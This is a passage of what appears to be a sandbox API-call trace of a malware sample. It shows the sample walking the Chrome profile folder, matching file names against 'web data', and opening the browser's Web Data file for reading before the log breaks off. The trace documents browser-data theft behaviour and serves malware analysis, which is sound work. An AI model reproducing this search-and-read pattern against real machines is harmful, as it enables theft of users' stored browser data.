(lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0591.042] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63c5b0 [0591.042] LocalFree (hMem=0x63be60) returned 0x0 [0591.042] StrStrIW (lpFirst="LOG", lpSrch="web data") returned 0x0 [0591.042] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.042] lstrlenW (lpString="\\") returned 1 [0591.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0591.042] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63be60 [0591.042] lstrlenW (lpString="MANIFEST-000001") returned 15 [0591.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0591.042] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x5dc080 [0591.042] LocalFree (hMem=0x63be60) returned 0x0 [0591.042] StrStrIW (lpFirst="MANIFEST-000001", lpSrch="web data") returned 0x0 [0591.042] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0 [0591.042] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.043] LocalFree (hMem=0x63bd28) returned 0x0 [0591.043] LocalFree (hMem=0x63e118) returned 0x0 [0591.043] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.043] lstrcmpiW (lpString1="Extensions", lpString2=".") returned 1 [0591.043] lstrcmpiW (lpString1="Extensions", lpString2="..") returned 1 [0591.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.043] lstrlenW (lpString="\\") returned 1 [0591.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.043] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed7a0 [0591.043] lstrlenW (lpString="Extensions") returned 10 [0591.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.043] LocalAlloc (uFlags=0x40, uBytes=0x116) returned 0x63e118 [0591.043] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0591.043] lstrlenW (lpString="\\*.*") returned 4 [0591.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0591.043] LocalAlloc (uFlags=0x40, uBytes=0x11e) returned 0x63e240 [0591.043] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*.*", lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0x5b9b50 [0591.043] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.043] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.043] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.043] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.043] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.043] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2=".") returned 1 [0591.043] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="..") returned 1 [0591.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0591.043] lstrlenW (lpString="\\") returned 1 [0591.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0591.043] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x63e368 [0591.043] lstrlenW (lpString="aohghmighlieiainnegkcijnfilokake") returned 32 [0591.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned 75 [0591.043] LocalAlloc (uFlags=0x40, uBytes=0x158) returned 0x574838 [0591.043] LocalFree (hMem=0x63e368) returned 0x0 [0591.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0591.043] lstrlenW (lpString="\\*.*") returned 4 [0591.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0591.044] LocalAlloc (uFlags=0x40, uBytes=0x160) returned 0x2edc850 [0591.044] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*.*", lpFindFileData=0x52d6a0 | out: lpFindFileData=0x52d6a0) returned 0x5b9b10 [0591.044] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.044] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6a0 | out: lpFindFileData=0x52d6a0) returned 1 [0591.044] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.044] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.044] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6a0 | out: lpFindFileData=0x52d6a0) returned 1 [0591.044] lstrcmpiW (lpString1="0.0.0.6_0", lpString2=".") returned 1 [0591.044] lstrcmpiW (lpString1="0.0.0.6_0", lpString2="..") returned 1 [0591.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0591.044] lstrlenW (lpString="\\") returned 1 [0591.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0591.044] LocalAlloc (uFlags=0x40, uBytes=0x15a) returned 0x2edd9c0 [0591.044] lstrlenW (lpString="0.0.0.6_0") returned 9 [0591.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\") returned 108 [0591.044] LocalAlloc (uFlags=0x40, uBytes=0x16c) returned 0x2eddb28 [0591.044] LocalFree (hMem=0x2edd9c0) returned 0x0 [0591.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0591.044] lstrlenW (lpString="\\*.*") returned 4 [0591.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0591.044] LocalAlloc (uFlags=0x40, uBytes=0x174) returned 0x2eddca0 [0591.044] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\*.*", lpFindFileData=0x52d424 | out: lpFindFileData=0x52d424) returned 0x5b9bd0 [0591.044] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.044] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d424 | out: lpFindFileData=0x52d424) returned 1 [0591.044] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.044] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.044] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d424 | out: lpFindFileData=0x52d424) returned 1 [0591.044] lstrlenW (lpString="\\") returned 1 [0591.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0591.044] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x2edee28 [0591.044] lstrlenW (lpString="icon_128.png") returned 12 [0591.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0591.044] LocalAlloc (uFlags=0x40, uBytes=0x186) returned 0x2edefa0 [0591.044] LocalFree (hMem=0x2edee28) returned 0x0 [0591.044] StrStrIW (lpFirst="icon_128.png", lpSrch="web data") returned 0x0 [0591.044] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d424 | out: lpFindFileData=0x52d424) returned 1 [0591.044] lstrlenW (lpString="\\") returned 1 [0591.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0591.044] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x2edee28 [0591.044] lstrlenW (lpString="icon_16.png") returned 11 [0591.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0591.044] LocalAlloc (uFlags=0x40, uBytes=0x184) returned 0x2edf130 [0591.044] LocalFree (hMem=0x2edee28) returned 0x0 [0591.045] StrStrIW (lpFirst="icon_16.png", lpSrch="web data") returned 0x0 [0591.045] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d424 | out: lpFindFileData=0x52d424) returned 1 [0591.045] lstrlenW (lpString="\\") returned 1 [0591.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0591.045] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x2edee28 [0591.045] lstrlenW (lpString="main.html") returned 9 [0591.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0591.045] LocalAlloc (uFlags=0x40, uBytes=0x180) returned 0x2edf2c0 [0591.045] LocalFree (hMem=0x2edee28) returned 0x0 [0591.045] StrStrIW (lpFirst="main.html", lpSrch="web data") returned 0x0 [0591.045] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d424 | out: lpFindFileData=0x52d424) returned 1 [0591.045] lstrlenW (lpString="\\") returned 1 [0591.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0591.045] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x2edee28 [0591.045] lstrlenW (lpString="main.js") returned 7 [0591.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0591.045] LocalAlloc (uFlags=0x40, uBytes=0x17c) returned 0x2edf448 [0591.045] LocalFree (hMem=0x2edee28) returned 0x0 [0591.045] StrStrIW (lpFirst="main.js", lpSrch="web data") returned 0x0 [0591.045] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d424 | out: lpFindFileData=0x52d424) returned 1 [0591.045] lstrlenW (lpString="\\") returned 1 [0591.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0591.045] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x2edee28 [0591.045] lstrlenW (lpString="manifest.json") returned 13 [0591.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0591.045] LocalAlloc (uFlags=0x40, uBytes=0x188) returned 0x2edf5d0 [0591.045] LocalFree (hMem=0x2edee28) returned 0x0 [0591.045] StrStrIW (lpFirst="manifest.json", lpSrch="web data") returned 0x0 [0591.045] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d424 | out: lpFindFileData=0x52d424) returned 1 [0591.045] lstrcmpiW (lpString1="__MACOSX", lpString2=".") returned 1 [0591.045] lstrcmpiW (lpString1="__MACOSX", lpString2="..") returned 1 [0591.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0591.045] lstrlenW (lpString="\\") returned 1 [0591.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0591.045] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x2edee28 [0591.045] lstrlenW (lpString="__MACOSX") returned 8 [0591.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0591.045] LocalAlloc (uFlags=0x40, uBytes=0x17e) returned 0x2edf760 [0591.045] LocalFree (hMem=0x2edee28) returned 0x0 [0591.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\__MACOSX") returned 126 [0591.045] lstrlenW (lpString="\\*.*") returned 4 [0591.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\__MACOSX") returned 126 [0591.045] LocalAlloc (uFlags=0x40, uBytes=0x186) returned 0x2edf8e8 [0591.045] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\__MACOSX\\*.*", lpFindFileData=0x52d1a8 | out: lpFindFileData=0x52d1a8) returned 0x5b9b90 [0591.045] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.045] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d1a8 | out: lpFindFileData=0x52d1a8) returned 1 [0591.045] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.045] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.045] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d1a8 | out: lpFindFileData=0x52d1a8) returned 0 [0591.045] FindClose (in: hFindFile=0x5b9b90 | out: hFindFile=0x5b9b90) returned 1 [0591.045] LocalFree (hMem=0x2edf8e8) returned 0x0 [0591.046] LocalFree (hMem=0x2edf760) returned 0x0 [0591.046] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d424 | out: lpFindFileData=0x52d424) returned 0 [0591.046] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.046] LocalFree (hMem=0x2eddca0) returned 0x0 [0591.046] LocalFree (hMem=0x2eddb28) returned 0x0 [0591.046] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6a0 | out: lpFindFileData=0x52d6a0) returned 0 [0591.046] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.046] LocalFree (hMem=0x2edc850) returned 0x0 [0591.046] LocalFree (hMem=0x574838) returned 0x0 [0591.046] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 1 [0591.046] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0591.046] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0591.046] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0591.046] lstrlenW (lpString="\\") returned 1 [0591.046] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0591.046] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x63e368 [0591.046] lstrlenW (lpString="Temp") returned 4 [0591.046] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned 75 [0591.046] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63e490 [0591.046] LocalFree (hMem=0x63e368) returned 0x0 [0591.046] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp") returned 79 [0591.046] lstrlenW (lpString="\\*.*") returned 4 [0591.046] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp") returned 79 [0591.046] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bd28 [0591.046] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp\\*.*", lpFindFileData=0x52d6a0 | out: lpFindFileData=0x52d6a0) returned 0x5b9b10 [0591.046] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.046] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6a0 | out: lpFindFileData=0x52d6a0) returned 1 [0591.046] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.046] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.046] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6a0 | out: lpFindFileData=0x52d6a0) returned 0 [0591.046] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.046] LocalFree (hMem=0x63bd28) returned 0x0 [0591.046] LocalFree (hMem=0x63e490) returned 0x0 [0591.046] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d91c | out: lpFindFileData=0x52d91c) returned 0 [0591.046] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.046] LocalFree (hMem=0x63e240) returned 0x0 [0591.046] LocalFree (hMem=0x63e118) returned 0x0 [0591.046] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.046] lstrlenW (lpString="\\") returned 1 [0591.046] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.046] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed7a0 [0591.046] lstrlenW (lpString="Favicons") returned 8 [0591.046] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.046] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x63e118 [0591.047] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.047] StrStrIW (lpFirst="Favicons", lpSrch="web data") returned 0x0 [0591.047] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.047] lstrlenW (lpString="\\") returned 1 [0591.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.047] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed7a0 [0591.047] lstrlenW (lpString="Favicons-journal") returned 16 [0591.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.047] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.047] StrStrIW (lpFirst="Favicons-journal", lpSrch="web data") returned 0x0 [0591.047] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.047] lstrlenW (lpString="\\") returned 1 [0591.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.047] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.047] StrStrIW (lpFirst="Google Profile.ico", lpSrch="web data") returned 0x0 [0591.047] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.047] lstrlenW (lpString="\\") returned 1 [0591.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.047] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.047] StrStrIW (lpFirst="History", lpSrch="web data") returned 0x0 [0591.047] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.047] lstrlenW (lpString="\\") returned 1 [0591.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.047] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.047] StrStrIW (lpFirst="History Provider Cache", lpSrch="web data") returned 0x0 [0591.047] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.047] lstrlenW (lpString="\\") returned 1 [0591.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.047] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.047] StrStrIW (lpFirst="History-journal", lpSrch="web data") returned 0x0 [0591.047] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.047] lstrlenW (lpString="\\") returned 1 [0591.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.047] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.047] StrStrIW (lpFirst="Login Data", lpSrch="web data") returned 0x0 [0591.047] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.047] lstrlenW (lpString="\\") returned 1 [0591.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.047] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.047] StrStrIW (lpFirst="Login Data-journal", lpSrch="web data") returned 0x0 [0591.047] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.047] lstrlenW (lpString="\\") returned 1 [0591.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.047] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.047] StrStrIW (lpFirst="Network Action Predictor", lpSrch="web data") returned 0x0 [0591.047] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.047] lstrlenW (lpString="\\") returned 1 [0591.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.048] StrStrIW (lpFirst="Network Action Predictor-journal", lpSrch="web data") returned 0x0 [0591.048] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.048] lstrlenW (lpString="\\") returned 1 [0591.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.048] StrStrIW (lpFirst="Preferences", lpSrch="web data") returned 0x0 [0591.048] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.048] lstrlenW (lpString="\\") returned 1 [0591.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.048] StrStrIW (lpFirst="previews_opt_out.db", lpSrch="web data") returned 0x0 [0591.048] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.048] lstrlenW (lpString="\\") returned 1 [0591.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.048] StrStrIW (lpFirst="previews_opt_out.db-journal", lpSrch="web data") returned 0x0 [0591.048] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.048] lstrlenW (lpString="\\") returned 1 [0591.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.048] StrStrIW (lpFirst="README", lpSrch="web data") returned 0x0 [0591.048] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.048] lstrlenW (lpString="\\") returned 1 [0591.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.048] StrStrIW (lpFirst="Secure Preferences", lpSrch="web data") returned 0x0 [0591.048] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.048] lstrlenW (lpString="\\") returned 1 [0591.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.048] StrStrIW (lpFirst="Shortcuts", lpSrch="web data") returned 0x0 [0591.048] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.048] lstrlenW (lpString="\\") returned 1 [0591.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.048] StrStrIW (lpFirst="Shortcuts-journal", lpSrch="web data") returned 0x0 [0591.048] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.048] lstrlenW (lpString="\\") returned 1 [0591.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.048] StrStrIW (lpFirst="Top Sites", lpSrch="web data") returned 0x0 [0591.048] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.048] lstrlenW (lpString="\\") returned 1 [0591.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.048] StrStrIW (lpFirst="Top Sites-journal", lpSrch="web data") returned 0x0 [0591.048] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.048] lstrlenW (lpString="\\") returned 1 [0591.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.048] StrStrIW (lpFirst="Visited Links", lpSrch="web data") returned 0x0 [0591.048] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.048] lstrlenW (lpString="\\") returned 1 [0591.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.049] StrStrIW (lpFirst="Web Data", lpSrch="web data") returned="Web Data" [0591.049] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52db74 | out: ppstm=0x52db74*=0x63a0a8) returned 0x0 [0591.049] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0591.049] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0591.049] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, 